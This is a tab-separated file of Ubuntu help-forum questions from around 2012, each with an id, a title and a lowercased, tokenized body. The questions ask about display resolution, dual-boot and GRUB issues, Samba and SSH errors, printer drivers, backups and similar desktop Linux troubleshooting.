108111	problem using minidisplay port adapter to vga on dell xps l502x	it 's my first question here and i feel really bothered by this problem . i recently bought a new aoc e2343f2k 23 '' monitor , it supports 1920x1080 resolution and when i plugged by the first time , it worked perfectly . i made some changes ( i do not recall what ) , and i can no longer get full hd resolution , the best i can get is 1440x900 . i tried to install another different distros in order to check if the source problem is the os , but no success . i do n't know what to do . i forced the resolution using xrandr but it also did not work , the screen resolution is expanded beyond the monitor edges and i ca n't see the right and left side of the desktop and the screen image quality is poor . any suggestions ?
108116	i think i deleted windows 7 when trying to install ubuntu 11.10	what happened is i attempted to download and install the operating system ubuntu 11.10 on my computer . i had planned to choose which operating system to boot , but there were a few options on the website : install along with `` windows '' which is what i wanted to do install from a cd or usb after i installed it i noticed that i could not boot using windows , all the folders , files and programs for windows 7 could be found under ubuntu , but i could n't run any of them using wine . i want to know if i removed the operating system windows , if i could use it again if i needed it , and how to operate the wine application . to make clear in the page i chose the option to install the usb and it says not run with windows .
108117	installed netatalk but still cant connect by afp	i have a new server install . i just installed netatalk and avahi . i see my server appear on my mac but when i connect it tells me there was a problem connecting to this server . i have afpd_uamlist= '' -u uams_dhx2.so '' set . i thought this was what was required for lion . i hope someone can help . here is the error message in /var/log/syslog : mar 2 17:48:23 supermassive afpd [ 2413 ] : =============================================================== mar 2 17:48:23 supermassive afpd [ 2413 ] : internal error : signal 11 in pid 2413 ( 2.2-beta4 ) mar 2 17:48:23 supermassive afpd [ 2413 ] : =============================================================== mar 2 17:48:23 supermassive afpd [ 2413 ] : backtrace : 3 stack frames : mar 2 17:48:23 supermassive afpd [ 2413 ] : # 0 /usr/sbin/afpd ( netatalk_panic+0x1c ) [ 0x7f18b5ce449c ] mar 2 17:48:23 supermassive afpd [ 2413 ] : # 1 /usr/sbin/afpd ( +0x4d59c ) [ 0x7f18b5ce459c ] mar 2 17:48:23 supermassive afpd [ 2413 ] : # 2 /lib/x86_64-linux-gnu/libc.so.6 ( +0x36420 ) [ 0x7f18b4cc0420 ]
108130	how do i set a custom thumbnailer for audio/x-vorbis+org ?	google shows this error referenced on some thunderbird bug , but it 's not clear to me how they resolve it . here is my issue : i have vorbis file : xdg-mime query filetype `` my-file1.ogg '' â output : x-vorbis+ogg xdg-mime query filetype `` my-file2.oga '' â output : x-vorbis+ogg i tried to add a key in gconf with gconftool-2 using above mime-type ( x-vorbis+ogg ) and i got this error : `+ ' is an invalid character in key/directory names if i ignore reported mime-type by xdg-mime and instead use simple mime-type for vorbis - ogg , then the key works only for files with extension `` .oga '' but not with more common extension `` .ogg '' what to do ? is it possible to escape 'plus ' sign in reported vorbis mime-type when passing to gconftool-2 ? is this but in gconftool-2 ?
108132	getting pogo games to work	i have ubuntu 11.10 , and have tried and googled till my eyes want to bleed . javaws works on about 50 % of apps on the machine in commercial sites . yahoo sports will work for instance , but not the games . i have tried 3 browsers , firefox/chrome/opera with no luck on the plugin . the oracle plugin is only v.6 and just crashes . the openjdk sits forever or force closes my browser . right now i am having to run a virtualbox installed win7 to play pogo games with my wife ( which is just sad ) . please if there is a clear way to make the plugin work with a recent machine ? thank you in advance !
108135	how do i set the default size of /dev/shm ?	i 'd like to change the default size of /dev/shm in lubuntu 11.10 ( also known as /run/shm now , i guess ) . it does n't seem to appear in my fstab : # / was on /dev/sdb5 during installation uuid=66ac63f0-45fa-4766-9d20-7c56bcd0460d / ext3 noatime , errors=remount-ro 0 1 # /home was on /dev/sdb7 during installation uuid=227f1b29-5d04-4c28-9c9c-ea70b1726434 /home ext3 noatime 0 2 # swap was on /dev/sdb6 during installation # uuid=9e13b7cc-1f75-4b4e-9e79-c0f7368de353 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 tmpfs /tmp tmpfs defaults , noexec , nosuid 0 0 tmpfs /var/tmp tmpfs defaults , noexec , nosuid 0 0
108138	pandoc on ubuntu ca n't use beamer	i 'm using pandoc to author slides . i 'd like to see how the beamer pdf output looks , but i 'm getting an error : $ pandoc -t beamer talk.txt -o talk.pdf pandoc : unknown writer : beamer any ideas ?
108158	no module named mysqldb when trying to load the openstack dashboard	i 'm trying to install openstack dashboard following this guide from git : http : //wiki.openstack.org/openstackdashboard but when i run this command to sync database : $ tools/with_venv.sh openstack-dashboard/manage.py syncdb it returns that : file `` /home/user1/horizon/.venv/local/lib/python2.7/sitepackages/django/db/backends/mysql > /base.py '' , line 14 , in < module > raise improperlyconfigured ( `` error loading mysqldb module : % s '' % e ) django.core.exceptions.improperlyconfigured : error loading mysqldb module : no module named mysqldb i installed package `` python-mysqldb '' several times , but it 's still raised this error . when i run : > > > import mysqldb in python interpreter , it 's fine ! and i tried to install through easy_install , but the mysql-python is installed : $ sudo easy_install mysql-python searching for mysql-python best match : mysql-python 1.2.3 mysql-python 1.2.3 is already the active version in easy-install.pth using /usr/lib/pymodules/python2.7 processing dependencies for mysql-python finished processing dependencies for mysql-python here are the content of tools/with_venv.sh # ! /bin/bash tools=`dirname $ 0` venv= $ tools/../.venv source $ venv/bin/activate & & $ @ when i run : tools/with_venv.sh it returns nothing . what 's wrong in my case ?
108163	selective command-history in the terminal ?	within a terminal , when you press up in your keyboard , you get to see the past commands you have given to it before in order . i was wondering if there was a way to see only the commands in the past starting with -for instance , `` ls -l '' . that way , if the list of commands is : ls -l -a cmake cd ~/desktop cmake a way to just write `` ls '' and tab or whatever combination of key-strokes needed to pop up the past command giving in to the terminal starting with `` ls '' thanks ,
108170	can i install 32 bit ubuntu on dual boot with 64 bit windows 7 ?	i 'm asking this because i 've downloaded the ubuntu 11.10 32 bit iso , burned it to a cd and tried to install it on my pc but the installation screen never shows up . when i start the cd i choose `` install ubuntu '' and some codes run on my screen , then the screen becomes purple and says `` ubuntu '' and starts loading . several minutes after , the screen goes black and it stays black for like forever . have i done something wrong ? i do n't know why i have this problem . i had windows 7 64 bit on dual boot ( wubi ) with ubuntu 11.10 64 bit and it worked fine ...
108172	how to remove multiple network manager applets ?	when i typed nm-applet in alt+f2 , i got multiple network menu and i want to remove it . can anyone help me ?
108174	what does `` introspection '' mean , and how is it related to gobject introspection ?	what does introspection mean exactly ? how is it useful for a programmer ? can somebody please explain in layman terms ?
108175	ubuntu mirror hosted on akamai cdn ?	i 'm looking for ubuntu mirror that is hosted on akamai cdn . in my country , average internet speed is 128 kbps . with this speed it is very difficult to update ubuntu and install software . however with my isp i can get high speed ( 1mbps ) speed from cdns like akamai . earlier , in software sources - > mirror list - > select best server , ubuntu.sth.sze.hu was picked . it had worked pretty good . ( more than 3 mbps ) . now biruni.upm.my/mirror/ubuntu/ is picked . but neither of the mirror has any better speed now . so i was wondering if there are some mirrors that are hosted on cdns like akamai so that i can enter it manually . or if there are some other tools like `` select best server '' so that i can try them as well . btw we had local mirror called archive.mitra.net.np/ubuntu , but the company does n't exist anymore .
108177	problem launch xubuntu	i have a dell latitude c400 and i installed xubuntu 11.10 for it to work ( windows xp too slow ) and when i run it , it 's marked with a xubuntu wallpaper and all , the bar that advance and after that it can not run the office and it makes me a black screen and this is the last output i see : * pulseaudio configured for per-user sessions saned disabled ; edit / default / saned * stopping anac ( h ) ronistic cron [ ok ] * checking battery state . . . [ ok ] how to solve this problem ? ( sorry , i used google translation for translate this message from french . ) bonjour , j'ai un dell latitude c400 et j'ai installé un xubuntu 11.10 pour le faire marcher ( windows xp trop lent ) et quand je le lance , il y a marqué xubuntu avec un fond d'écran et tout , la barre qui avance et après , ça n'arrive pas à lancer le bureau et ça me met un écran noir avec marqué : [ ok ] * pulseaudio configured for per-user sessions saned disabled ; edit /default/saned * stopping anac ( h ) ronistic cron [ ok ] * checking battery state . . . [ ok ] comment faire pour résoudre ce problème ou comment lancer le bureau , merci de m'aider . antauf
108178	how to install libxml2-dev ( 32-bit ) package on a 64-bit ubuntu ( 11.10 )	i want to run an binary for a 32-bit application which is dynaically linked to the libxml2 on a 64-bit ubuntu ( 11.10 ) . i have found and installed 32-bit libraries for most of the other libraries used , however i can not find a package to install all 32-bit version of libxml2-dev . what packages do i have to install in order to make it run ? starting the application will lead to the following error libxml2.so.2 : wrong elf class : elfclass64 i succeeded to install a 32 bit version of zlib in /ust/lib32 but i can not find a 32 bit version of libxml2 . the synaptic package manager list a libxml2-dev : i386 package . however since this eants to uninstall almost all installed packages i assume that this is for a pure 64 bit linix any help ?
108184	how do i scan from my panasonic dp-c305	i really hope someone can help me with this problem as it has been bugging me for a while . at work i use ubuntu 11.10 , we also use a panasonic dp-c305 as our main working printer i had finally managed to get the drivers to work with my machine after a couple of hours of internet searching . i am using free drivers that can be found here but i can not find anything for the scanner . the printer/scanner is connected to the network and i am unable to move my computer to the printer to connect through usb . i hope i have given enough information for people to help me out . thank you for any help that you can provide .
108188	play dvd from movie player	i 'm running ubuntu 11.10 . when i insert a dvd ( into my macbook pro ) , i have the choice to play it through movie player , and it plays fine . however , if i then close movie player , and reopen it , i get stuck . pressing play does n't do anything . open ... from the movie menu just allows me to select files , not the disk . open location ... requires me to type in a place . go has everything disabled . so , without ejecting the disk and inserting it again , how am i supposed to play a dvd from movie player ?
108192	ubuntu 11.10 installer starts again after shut down	when i install ubuntu 11.10 in virtual box , everything works fine till this time . but when i shutdown the machine and boot it , installer again starts . whatever changes made to the machine are also gone . the user name created is also not displayed anywhere.. please help..
108199	what is the purpose of the desktop switcher ?	what is the real use of desktop switcher in the ubuntu ? . i have opened a firefox instance in one desktop . then i switched to another desktop and tried opening another instance of firefox . its not happening because we can have only one instance . then what is the real use for multiple desktop ?
108208	retrieve old evolution address book	how can i retrieve evolution 's address book from an old install ? i used the backup/restore feature of evolution after an upgrade , but the restore was giving me problems so i had to wipe out the .evolution folders and start over . how can i get hold of my old address book from the original .evolution folder ? the files are in the .db format , and i ca n't import them from within evolution . i tried deleting the current address book folder ( /.local/share/evolution/addressbook ) and replacing it with the original folder , but the address book does not get loaded by evolution .
108212	desktop sharing - which port to forward ?	i 'm trying to share my desktop with the integrated tool desktop sharing is there ports to forward on the router , and which ones ?
108217	ssh `` host key verification failed ''	i am supposed to put up a file on a server from my own computer with ssh as a school assignment . it has been a slow process but now i 'm stuck . i have googled but not found anything that has helped . as i am a total beginner at this it is probably some stupid fault of mine , so please help me out ( easy instructions , expect me to do it wrong ; ) ) . below is the terminal text from where i am stuck , i have tried both logged in on my computer and logged in on the server . logged in on the server : teddy @ rymd-srv : ~ $ ssh-keygen -r teddy @ elev.rymdgymnasiet.com /home/teddy/.ssh/known_hosts updated . original contents retained as /home/teddy/.ssh/known_hosts.old teddy @ rymd-srv : ~ $ scp -r teddy @ 85.226.40.57 : /home/teddy/pictures/filetransfer.jpeg teddy @ elev.rymdgymnasiet.com : /home/teddy teddy @ 85.226.40.57 's password : host key verification failed . lost connection logged in on my own computer : teddy @ teddysdator : ~ $ ssh-keygen -r teddy @ elev.rymdgymnasiet.com /home/teddy/.ssh/known_hosts updated . original contents retained as /home/teddy/.ssh/known_hosts.old teddy @ teddysdator : ~ $ scp -r teddy @ 85.226.40.57 : /home/teddy/pictures/filetransfer.jpeg teddy @ elev.rymdgymnasiet.com : /home/teddy the authenticity of host '85.226.40.57 ( 85.226.40.57 ) ' ca n't be established . ecdsa key fingerprint is ef:9c:4c:41:3c:9d : b1:40:05:67:30:34 : e8 : d3 : ab : c6 . are you sure you want to continue connecting ( yes/no ) ? yes warning : permanently added '85.226.40.57 ' ( ecdsa ) to the list of known hosts . teddy @ 85.226.40.57 's password : host key verification failed . lost connection
108225	why does my hp mini keeps on restarting instead of shutting down ?	i am on ubuntu 11.10 and this is at least my 20th install of ubuntu and have had a fair few niggling issues with it . the most annoying is the fact that when i go to shutdown the laptop from the cog , whether logged in or not it simply restarts - everytime ! the only way to prevent this is to hold the power button , or keep it in hibernate - not ideal .
108228	migrate windows 7 network drive to ubuntu 11.10 for use as a file server	on my network ( 7 computers with windows 7 pro ) one of the computers has a partitioned hdd and sharing that partition as a network drive for all other users to access . all other computers have a that drive mapped to z : i want to migrate the data from the shared drive to a new computer with ubuntu 11.10 and use samba to share files with the windows computers , which is n't too complicated , but now my question arises . what must i watch out for so all linked documents , programs , etc . continue to work ? there are lots of excel files with cells linked to other excel files ( ='z : \folder\anotherfolder\ [ file.xls ] sheet2 ' ! f3 ) i have already had a look at this link , but it 's more for desktop migration ... i would also appreciate your opinion on weather to use ubuntu or ubuntu server , taking notice that the network has only 7 computers , the only purpose is to share files/folders and maybe backup .
108231	how do i check if a file is drm protected ?	how do i check whether a given file , such as an audio file , is drm protected or not ?
108239	openjdk6 not available	i run a server with ubuntu 10.04 ( lucid lynx ) minimal server , on amd64 system . i 'd like to install the openjdk packages ( jre and jdk ) , but when i try sudo apt-get install openjdk-6-jdk i get package openjdk-6-jdk is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package openjdk-6-jdk has no installation candidate and i 'd like to install this package andi do n't know how , while it seems to be available here
108240	math application to calculate advance problems	i am looking for a math app in ubuntu that it is easy to write and can calculate problems like stochastic processes in probability theories , ordinary differential equation and similars .
108250	downloading to cd , want to make sure i 'm doing it right	i 've got an ancient umax 333t laptop that 's pretty much dead , but i was wondering if i could breathe new life into it by downloading a free os . that brought me here . download ubuntu if i download it to my pc 's hard drive , will it automatically change anything on my pc ? do i then burn to cd and try on laptop ? thanks !
108258	what is the bash equivalent of dos 's pause command ?	i need a pause on a shell script to show a warning before continuing . for instance , on dos it goes like this : doit.bat : [ ... ] echo 'are you sure ? press ctrl-c to abort , enter to continue . ' pause [ ... ] how can i do this on bash ? for the moment a sleep command seems to do the trick and is simple enough but is not exactly the idea : doit.sh [ ... ] echo 'are you sure ? press ctrl-c to abort . ' sleep 3 [ ... ]
108262	how to open .mobi with double click	i have .mobi book and want double click on it to open book with calibre ereader . i tried to open choosing option open with other application but there is not calibre ereader . of course everything is ok , when i first open calibre and then choose book . how to set file association for .mobi ?
108266	wifi on hp pavilion dv6 stopped working after update to 11.10	i am running ubuntu 11.10 and windows 7 on my hp pavilion dv6 . before the 11.10 update , everything was working perfectly , but after i updated , i 've never been able to use the wifi with ubuntu . for the most part , i 've just stuck to windows and when i 've needed to use ubuntu , i 've just been plugging in a network cable . the additional drivers are installed and it says they 're active , but the wireless is n't working . what can i do to find the problem ?
108268	hex/decimal/ascii editor ( save game editor )	in windows there are some tools to edit saved games , for example the old uge ( universal game editor ) and cheat engine . i am looking for a hex/decimal editor that can read this files and find/replace values . for example changing gold , hp , etc ... the editor should have the ability see signed/unsigned 1byte/2byte/4byte information as well as hex/decimal notation .
108274	gnome shell transparency issue with a theme	just installed gnome shell and started theming it , and `` le wild gray stripe appeared '' on the panel , does n't matter what theme i use , except for the default as i guess it does n't use transparency , anyone recognise this ?
108287	chrome or chromium icon does n't show in the launcher	i have got google chrome browser on ubuntu 11.10 , and when i open it , it wo n't appear on/in the sidebar . i then download chromium , but the same thing happens . i try dragging it to the sidebar , but when i click it , it does n't show it as open . how do i fix this ?
108289	minimizing power consumption of laptop with intel graphics	i am considering to try what is mentioned here - battery life decreased after upgrade to 11.04 - concerning minimizing power consumption . for example i see that in my case - i915.i915_enable_rc6=0 by issuing the following command cat /sys/module/i915/parameters/i915_enable_rc6 . would it be possible to switch it to 1 after booting ? if yes , how can we do that ?
108290	unity/compiz : hide titlebar of non-maximized windows	i would like to have the titlebar of non-maximized windows disappear . it should only be visible if the mouse hovers over the window . is this possible somehow ?
108291	desktop wo n't power back up	after i tried using the hibernate feature for the first time ( to save power/money ) , now i ca n't get it to power back on.. i have the latest ubuntu version , with a home built `` frankenbox '' using a 64-bit amd processor , and never had any problems . i 've tried all the basics : mouse click , keyboard clicks , power button , reset button and then the main power shut off . the lights and fan come on for about 2 seconds , then it shut down again , not long enough to try any of the key combinations . any suggestions ?
108295	back up my ubuntu partition for quick restore	i have recently set up my laptop for my ubuntu environment . now that it 's the way that i want it , i want to back it up so if something happens , i can wipe the hard drive , re-install ubuntu from the original cd , then restore from backup to put everything back the way it is . so here 's the list of folders in my root directory of my hard drive . bin dev initrd.img lib32 media proc sbin sys var boot etc initrd.img.old lib64 mnt root selinux tmp vmlinuz cdrom home lib lost+found opt run srv usr vmlinuz.old i 'm thinking the things i need to backup are : bin boot etc home initrd.img lib lib32 lib64 opt -- this is where i install my development tools like eclipse and tomcat sbin usr vmlinuz anything else ?
108323	download files from amazon cloud	i am trying to download music files from amazon as described in this question , but in both banshee 's amazon mp3 or firefox i am taken to amazon 's page asking me to install it 's outdated i386 installer . i understand banshee > =2.0 can handle these .amz files , so i do n't want to download and install amazon 's old binary , but i ca n't seem to get amazon to let me past this step . what am i missing ?
108325	move unity launcher to another side of another screen	i am using ubuntu 11.10 with 2 screens , 1 having resolution of 1366x768 and one with 1920x1080 . as you could expect i 'd prefer the larger one as the primary screen . smaller one is on the left and larger on the right . due to the space available i can not switch their places . now to my question . this is how my screen looks now : the small one is primary and larger one is secondary . so is it possible to move the launcher bar to the monitor on the right , and to the right side of that monitor , meaning as far away from the current position ? thanks for help already in advance .
108334	dependency errors when installing cinelerra from a ppa	i am trying to install cinelerra , i have followed the instructions in https : //launchpad.net/~cinelerra-ppa/+archive/ppa basically open the terminal and sudo add-apt-repository ppa : cinelerra-ppa/ppa sudo apt-get update sudo apt-get install cinelerra but after the last line , in the terminal appears this ... some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cinelerra : depends : libguicast1 ( = 1:2.2-0.3~ppa1~oneiric1 ) but 1:2.2-0.6~ppa1~oneiric1 is to be installed depends : libmpeg3cine ( = 1:2.2-0.3~ppa1~oneiric1 ) but 1:2.2-0.6~ppa1~oneiric1 is to be installed depends : libquicktimecine ( = 1:2.2-0.3~ppa1~oneiric1 ) but 1:2.2-0.6~ppa1~oneiric1 is to be installed e : unable to correct problems , you have held broken packages . i am using ubuntu 11.10 32bits
108349	how can i download pictures to an ipad 2	i have tried ubuntu to ipad moving pictures with the two directly connected without being able to see pictures on the ipad . i tried the cloud in the hope that i could copy the pictures to the cloud . this part is successful . i 've got them in a pictures directory . for the ipad , i 've installed the ubuntu 1 ap and it is recognized but am unsure of how to get the sync to happen so i can see the pictures on the ipad 's photo application .
108352	how to run the windows application inside ubuntu ?	i want to run the windows based applications inside ubuntu . how can i do that ? . some of the application only runs on the windows os . please help me . thanks , krishna
108353	how can i reset my windows xp password using a livecd ?	my mom 's ancient winbook laptop , using windows xp professional , was also hooked up to a wireless keyboard and mouse . unfortunately , this caused it to only accept the account password at the login screen correctly when typed using the wireless keyboard , and after a software update the wireless keyboard stopped working , leaving only the laptop 's own keyboard . how can i use an ubuntu livecd to reset a windows xp password ?
108354	easiest , foolproof ubuntu usb device ?	i 'm a windows and android/java programmer with no recent linux experience . i want to help out some people doing android development running eclipse under ubuntu . so i want to get up to speed on ubuntu but i do n't want to repartition or otherwise alter my windows pc 's hard drive . i understand it 's possible to make an external usb device like a flash drive ( or external hard drive ? ? ) into a bootable ubuntu environment . there are hundreds of `` how to 's '' about this all over the web but in the `` comments '' section of many of them people say , `` no do n't do it that way , do it this other way ... '' so i 'm confused . is there a simple , foolproof way to plug in a thumb drive ( or usb harddrive ? ? ? ) into an otherwise-windows pc and boot into ubuntu linux so i can do real work and install real applications and have a real file system , etc , etc , in that environment , without modifying my windows pc ? ken is correct - i need a writable , persistent file system since i will be installing eclipse and doing android development . is there any place i can get a sense of the pros and cons of virtual box -vs- unetbootin ? in the latter , does the file system ( for my apps and files ) also live on the usb stick ? is virtual box stable enough for a production environment ? thanks in advance , again .
108360	how to make xfce ( xubuntu-desktop ) have no brightness-levels ?	i want to have a smoother experience . with xubuntu-desktop i have just about 6 brightnessteps with my laptop . but in gnome when the desktop darkens , it happens without steps like in mac . is it possible to do that aways , so the screen goes continously lighter or darker ?
108362	how do i get my lexmark x4650 printer working ?	i think that my printer stopped working with the switch to gnome 3 or unity . yes i have tried 32 and 64 bit os 's . here is the driver in order to actually install the driver , you need to extract it and then open up terminal and type sudo and then a space . then drag the script into the terminal window . here is what it said in the diver install window : extracting file : printdriver.te extracting file : lexmark-08z-series-driver-1.0-1.i386.deb extracting file : launcher.c extracting file : launcherfallendohingy @ ubuntu-inspiron-15r : ~ $ sudo '/home/fallendohingy/downloads/lexmark-08z-series-driver-1.0-1.i386.deb.sh ' [ sudo ] password for fallendohingy : verifying archive integrity ... all good . uncompressing nixstaller ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. collecting info for this system ... operating system : linux cpu arch : x86_64 warning : no installer for `` x86_64 '' found , defaulting to x86 ... tracking ident = 170209 cpu speed = 2394 mhz ram size = 3762.69921875 mb hd avail = 74348 mb ( gtk:17645 ) : gdkpixbuf-warning ** : can not open pixbuf loader module file '/usr/lib/i386-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders.cache ' : no such file or directory ( gtk:17645 ) : gdkpixbuf-warning ** : can not open pixbuf loader module file '/usr/lib/i386-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders.cache ' : no such file or directory ( gtk:17645 ) : gdkpixbuf-warning ** : can not open pixbuf loader module file '/usr/lib/i386-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders.cache ' : no such file or directory ( gtk:17645 ) : gdkpixbuf-warning ** : can not open pixbuf loader module file '/usr/lib/i386-linux-gnu/gdk-pixbuf-2.0/2.10.0/loaders.cache ' : no such file or directory /usr/lib/gio/modules/libgvfsdbus.so : wrong elf class : elfclass64 failed to load module : /usr/lib/gio/modules/libgvfsdbus.so extracting file : lsbrowser extracting file : lsusbdevice using dpkg installation ============================= execute : dpkg -i -- force-architecture lexmark-08z-series-driver-1.0-1.i386.deb > /tmp/selfgz17540/pkg/files/dpkg_msgs ============================= ============================= execute : rm lexmark-08z-series-driver-1.0-1.i386.deb ============================= ============================= execute : /sbin/udevadm control -- reload-rules ============================= successfully installed the .deb lexmark drivers .
108370	how can i make ubuntu 11.10 recognize my iphone 4 !	i have an iphone 4 and i am running ubuntu 11.10 but my phone will not mount to my laptop ! help please anyone ! ? ! ? !
108375	how to repair grub while dual booting ( win7 / ubuntu 11.10 )	i 've installed windows 7 and then ubuntu 11.10 , and then set up everything on easybcd . when i select ubuntu on the boot menu , i end-up in grub prompt ( like `` grub > '' in a black screen ) instead of loading ubuntu directly . i have to run : grub > root ( dh0,4 ) grub > kernel /vmlinuzblahblah root=/dev/sda6 grub > boot every time to boot ubuntu ( where vmlinuz is a long filename i always tab ) . how could i skip this process ?
108382	unable to write to samba home directories	so i have samba setup and running on my ubuntu box . i 've successfully logged in on my winxp machine , and was able to browse my home directories but an unable to create files , folders , etc . no write access . in my samba config , i have set the this line read only = no , thus granting access to write to my home directories . restarted samba in terminal using sudo restart smbd and no such luck . is there somewhere else i need to enable write access ? i also added create mask = 0775 and directory mask = 0775 but i 'm not too sure what that is doing . any suggestions ? edit i created a test share and was able to write to the share . my test share is /home/username/pictures but when trying to write from the home directories , access denied .
108383	how to fix grub default booting windows xp instead of ubuntu ?	i 've been reading a lot the last 2 weeks , but never found a working solution for my dual boot system . tried boot manager , this solves the automatic time setting . tried editing grub cfg by hand , nothing . all i want is : [ ] 1 ubuntu [ ] 2 ubuntu single user [ ] 3 memtest [ x ] 4 windows xp grub should boot entry 4 by default , but neither specifying the number nor the full boot entry does the job . any clues ?
108384	how can i execute couponprinter.exe to print coupon.com coupons ?	i have been using microsoft since 3.11 , fairly masterful in all things `` windows '' . taking plunge into linux without regrets ! so far , so good . ubuntu desktop for family , server with light gui for me ( i run a minecraft server ) . tried this back with mandrake , could n't figure things out enough , but times have changed ( mainly linux 's gui os 's ) big problem : my wife can not print coupons ! ! ! have firefox on her desktop , ubuntu 11.10 . the web site states specifically `` will not run on linux '' . it wants to install *.exe plug-in to run in browser . been reading about wine . is it the answer , and/or how ? coupon.com is problem . wants to install *.exe program to print `` manufacturer acceptable coupons '' . will try suggestion offered . thanks . ok , got past coupon.com website hurdle ( thanks ) . it now takes me to `` ready to print '' . next hurdle : it wants to install and run `` couponprinter.exe '' . workable ?
108388	how to setup a raid with 2 hard drives	i have 3 hard drives , 2 of which i want to set them up as raid . i understand that one of the raid types ( do not know if it is raid-0,1..6 ) improves performance by using 2 hard drives simultaneous . the 2 hard drives are identical . same size and all . how can i set them up as raid to improve performance on the desktop ubuntu ( this is not a server but a home computer ) .
108390	dnscrypt proxy not working	i 've installed dnscrypt proxy from https : //github.com/opendns/dnscrypt-proxy/downloads and installed it under ubuntu 11.10 x64 . i started the proxy by sudo /usr/sbin/dnscrypt-proxy -- daemonize syslog states dnscrypt-proxy [ 2615 ] : dnscrypt-proxy is ready : proxying from [ 127.0.0.1 ] to [ 208.67.220.220 ] i set the dns to localhost and restart the connection by gui . but the local dns can not be reached : dnscrypt-proxy [ 2615 ] : dnscrypt-proxy is ready : proxying from [ 127.0.0.1 ] to [ 208.67.220.220 ] netstat pid/program name tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 2231/dnscrypt-proxy someone has an idea ? thanks a lot !
108393	compiling pyqt4 program	i am trying to package a program i wrote ( using pyqt4 ) into a single executable for linux . i tried using pyinstaller however it has problems with importing gio ( for settings ) from gi.repository import gio running the application would give : importerror : can not import name gio i then tried to use bbfreeze . the problem here is that after compiling and running the application , i get this error message : typeerror : gobject.__init__ ( ) takes exactly 0 arguments ( 1 given ) for bbfreeze this is my script i am running to compile the code : # ! /usr/bin/env python from bbfreeze import freezer includes = [ `` gio '' ] excludes = [ ] bbfreeze_class = freezer ( 'dist ' , includes=includes , excludes=excludes ) bbfreeze_class.addscript ( `` main.py '' , gui_only=true ) bbfreeze_class.use_compression = 0 bbfreeze_class.include_py = true bbfreeze_class ( ) i am using ubuntu 11.10 and python 2.7 . if someone can help that would be great . this is my first time writing python and trying to compile it ( so i am not sure if there are better alternatives ) .
108396	can not log on to firefox after updating ?	i am a beginner user of ubuntu . in fact , i am just an adventurous user of this awesome program . i do n't even know the lingo to intelligently discuss this issue . please help a linux/ubuntu wannabe . thanks
108398	update manager history and rollback options ? ( trying to resolve touchpad issues )	i 'm having issues with my touchpad on my laptop . it does n't function properly . clicking seems to work fine , but moving the cursor to the left is very skittish . to the right it appears to work just fine . i move it left , and the cursor jumps right . i had this issue during the install process , but it seemed to go a away after the first boot and update . it has been working several weeks with out a problem . yesterday ( 2/27/2012 ) i was prompted by the update manager to install some updates . i think the touchpad stopped working properly after next reboot . currently i navigate the system by the keyboard and an external mouse . i want to use the touchpad again . i have searched the forums and found a number of people complaining about touchpad issues , with suggested workarounds , but i want try backing out the latest updates to see if the problem goes away . is there an easy way to rollback these updates ? hp pavillion dm4-2070 ubuntu 11.10 thanks !
108399	how to setup dual-boot with windowsxp and ubuntu on separte hard-drives already installed	i have windows professional installed on the 1st hard drive with the ntfs file system . i 've just installed ubuntu 11.10 on a second hard drive but did n't setup the dual boot during installation because i was confused that i might by accident , install on the wrong drive . so before the installation of ubuntu , i dis-connected the 1st hard drive with windowsxp from the power supply just to be safe . so now i 've been trying every thing to setup dual boot . what can i do to setup dual boot ?
108406	how can i have xfce automatically adjust to changing available outputs ?	in xfce , i can run settings - > display to change my preferred output monitor . what i have n't found an option for is to have it automatically adjust to a change in available outputs . for example , if i 'm using a dvi display , but undock my laptop , xfce will not automatically realize that i no longer have a working display and change the output . gnome did do this , though i 'm not sure through what service . i 'd like to have some way of making sure i always have at least one working output automatically . side note : this is related to another question of mine , if i just use a window manager and not a desktop environment , how do i get automatic dock/undock resolution updates ? , but is for xfce , not any generic window manager .
108410	mindstorms nxt support	i have the lego mindstorms nxt 2.0 software working fine on my windows computer , but i ca n't get it to work in ubuntu . i have tried both wine and playonlinux . this is all that is keeping me from wiping the windows partition off completely . did i miss something ? i not only need it to work , i need it to work well . i use it with bluetooth , and it is a high-graphics program through labview .
108411	printing a file from server	is it possible to print a file from my schools server terminal to my printer . how would i do that ? im not sure if this is possible if not how would i view the printers that are set up to print files .
108422	how to fix bad apt signatures after hardware clock reset	so recently i left my laptop unplugged for a few minutes , and since it has nearly zero battery , it cuts off without any graceful shutdown . after turning it on , it says ( via bios ) that the clock was reset or something , so i went into the bios and set it to the correct time , and merrily booted up . filesystem check happened , etc , nothing else seemed to be off . the problem is that updating apt results in all my ppas having invalid signatures , and apt always warning me about unsigned packages when i install them . i assume this is related to the clock resetting - nothing else seems to be out of place . is there anyway to reset apt so that it will stop complaining about the signatures ?
108427	how can i upgrade kde in kubuntu 11.10	how can i upgrade kde 4.7.4 to kde 4.8 in kubuntu 11.10 ? is it safe to upgrade or should i wait for kubuntu 12.04 .
108435	how to create live backup of hard drive .	i am looking to have a backup copy of my hard drive incase of failure . ideally i would like this to backup nightly . i want to be able to have 2 hd 's installed in the system at the same time and boot off of either drive if the other failed . i have seen some solutions with dd , but i am not sure that that is the best way to handle this , as i tried it , but then could never get the drive to boot . currently i am trying this : how to upgrade my hdd and keep my ubuntu 11.10 instalation but that does n't run nightly . i see this : how to replace my disk without having to rebuild my ubuntu install ? , but i tried this method only to get a drive that would n't boot . i did n't know how to get it to boot . tried removing the original drive , but the `` new '' drive would n't boot after selecting it in the bios . i am looking for a complete solution that backs up everything . this server has important data to me that i backup regularly , but i need to have a pretty quick way of restoring incase of a complete failure . thanks in advance !
